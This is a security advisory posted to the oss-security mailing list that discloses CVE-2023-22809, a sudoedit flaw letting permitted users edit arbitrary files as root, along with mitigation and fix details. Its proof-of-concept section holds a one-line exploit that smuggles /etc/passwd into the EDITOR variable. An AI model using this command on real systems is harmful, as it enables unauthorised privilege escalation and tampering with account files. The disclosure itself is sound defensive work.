Date: Thu, 19 Jan 2023 01:33:43 +0100 From: Matthieu Barjole <matthieu.barjole@...acktiv.com> To: oss-security@...ts.openwall.com Subject: CVE-2023-22809: Sudoedit can edit arbitrary files Hello everyone, While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit when a user is authorized to use it by the sudoers policy. This vulnerability was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1 inclusive. ## Analysis The technical analysis can be found in the following security advisory: https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf ## Proof of Concept Assuming the following sudoers policy: ``` # cat /etc/sudoers user ALL=(ALL:ALL) sudoedit /etc/motd [...] ``` Arbitrary files such as `/etc/passwd` may also be edited as such: ``` EDITOR='vim -- /etc/passwd' sudoedit /etc/motd ``` ## Mitigation It is possible to prevent a user-specified editor from being used by sudoedit by adding the following line to the sudoers file. ``` Defaults!sudoedit env_delete+="SUDO_EDITOR VISUAL EDITOR" ``` To restrict the editor when editing specific files, a Cmnd_Alias can be used, for example: ``` Cmnd_Alias EDIT_MOTD = sudoedit /etc/motd Defaults!EDIT_MOTD env_delete+="SUDO_EDITOR VISUAL EDITOR" user ALL = EDIT_MOTD ``` ## Fix The issue was fixed in Sudo 1.9.12.p2. ## References  https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf  https://www.sudo.ws/security/advisories/sudoedit_any/  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.